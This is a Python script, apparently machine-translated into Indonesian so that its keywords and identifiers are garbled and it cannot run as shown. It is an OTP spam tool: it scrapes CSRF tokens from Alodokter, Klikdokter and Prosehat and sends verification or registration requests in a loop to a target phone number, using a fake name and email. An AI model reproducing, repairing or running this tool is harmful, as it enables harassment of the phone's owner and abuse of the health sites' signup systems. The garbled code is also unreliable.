 

 permintaan impor , os , sys , waktu
dari  bs4  impor  BeautifulSoup  sebagai  BS

 dokter kelas :
	def  __init__ ( sendiri ):
		diri . ses = permintaan . Sesi ()

	def  alodoc ( self , num ):
		diri . se . header . update ({ 'referer' : 'https://www.alodokter.com/login-alodokter' })
		req1 = sendiri . se . dapatkan ( 'https://www.alodokter.com/login-alodokter' )
		BS1 = BS ( req1 . teks , 'html.parser' )
		tanda = bs1 . temukan ( 'meta' ,{ 'nama' : 'csrf-token' })[ 'konten' ]
# cetak (tanda)

		kepala = {
			'user-agent' : 'Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, seperti Gecko) Chrome/72.0.3626.121 Mobile Safari/537.36' ,
			'tipe konten' : 'aplikasi/json' ,
			'referer' : 'https://www.alodokter.com/login-alodokter' ,
			'terima' : 'aplikasi/json' ,
			'asal' : 'https://www.alodokter.com' ,
			'x-csrf-token' : token
		}
		req2 = sendiri . se . post ( 'https://www.alodokter.com/login-with-phone-number' , headers = head , json = { "user" :{ "phone" : num }})
# cetak(req2.json())
		jika  req2 . json ()[ 'status' ] ==  'berhasil' :
			print ( "[•] Berhasil" )
		lain :
			print ( "[-] Gagal" )

	def  klikdok ( self , num ):
		req1 = sendiri . se . dapatkan ( 'https://m.klikdokter.com/users/create' )
		bs = BS ( req1 . teks , 'html.parser' )
		tanda = bs . temukan ( 'masukan' ,{ 'nama' : '_token' })[ 'nilai' ]
# cetak (tanda)

		kepala = {
			'Koneksi' : 'tetap hidup' ,
			'Kontrol Tembolok' : 'max-age=0' ,
			'Origin' : 'https://m.klikdokter.com' ,
			'Upgrade-Insecure-Requests' : '1' ,
			'Content-Type' : 'application/x-www-form-urlencoded' ,
			'User-Agent' : 'Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, seperti Gecko) Chrome/72.0.3626.121 Mobile Safari/537.36' ,
			'Terima' : 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8' ,
			'Referer' : 'https://m.klikdokter.com/users/create?back-to=' ,
		}
		ata = {
			'_token' : token ,
			'nama_lengkap' : 'BambangSubianto' ,
			'email' : 'Hsjakaj@jskaka.com' ,
			'telepon' : nomor ,
			'kembali ke' : '' ,
			'kirim' : 'Daftar' ,
		}

		req2 = sendiri . se . post ( 'https://m.klikdokter.com/users/check' , header = head , data = ata )
# cetak(req2.url)
		jika  "sessions/auth?user="  di  req2 . url :
			print ( "[•] Berhasil" )
		lain :
			print ( "[-] Gagal" )

	def  prosehat ( diri , num ):
		kepala = {
			'accept' : 'aplikasi/json, teks/javascript, */*; q=0,01' ,
			'asal' : 'https://www.prosehat.com' ,
			'x-requested-with' : 'XMLHttpRequest' ,
			'user-agent' : 'Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, seperti Gecko) Chrome/72.0.3626.121 Mobile Safari/537.36' ,
			'content-type' : 'application/x-www-form-urlencoded; charset=UTF-8' ,
			'referer' : 'https://www.prosehat.com/akun' ,
		}
		ata = { 'phone_or_email' : num , 'action' : 'ajaxverificationsend' }

		req = permintaan . post ( 'https://www.prosehat.com/wp-admin/admin-ajax.php' , data = ata , header = head )
# cetak(teks.req)
		jika  "token"  di  req . teks :
			print ( "[•] Berhasil" )
			untuk  x  dalam  rentang ( 60 ):
				print ( end = f" \r >> Tidur { 60 - ( x + 1 ) } s << " , flush = True )
				waktu . tidur ( 1 )
			cetak ()
		lain :
			print ( f"[-] Gagal { req . text } " )
			untuk  x  dalam  rentang ( 60 ):
				print ( end = f" \r >> Tidur { 60 - ( x + 1 ) } s << " , flush = True )
				waktu . tidur ( 1 )
			cetak ()

sedangkan  Benar :
	coba :
		os . sistem ( 'jelas' )
		cetak ( """
		[ Tanya Dokter OTP ]
		 - Oleh Kang-Newbie -
[ Daftar Spam ]
1. Alodokter.com
2. Klikdokter.com
3. Prosehat.com
	""" )
		pil = int ( input ( "> Pilih: " ))
		cetak ( "=" * 25 )
		num = input ( "[?] Nomor Target: " )
		lop = int ( input ( "[?] Perulangan: " ))
		cetak ()

		utama = dokter ()
		jika  pil  ==  1 :
			untuk  saya  dalam  jangkauan ( lop ):
				utama . alodoc ( nomor )
		elif  pil  ==  2 :
			untuk  saya  dalam  jangkauan ( lop ):
				utama . klikdok ( nomor )
		elif  pil  ==  3 :
			untuk  saya  dalam  jangkauan ( lop ):
				utama . prosehat ( num )
		lain :
			print ( "?: Anda Buta!?" )

		lgi = input ( " \n [?] Coba lagi (Y/n) " )
		jika  lgi . bawah () ==  'n' :
			sys . keluar ( 'SELAMAT TINGGAL :*' )
	kecuali  Pengecualian  sebagai  Err :
		sys . keluar ( Err )
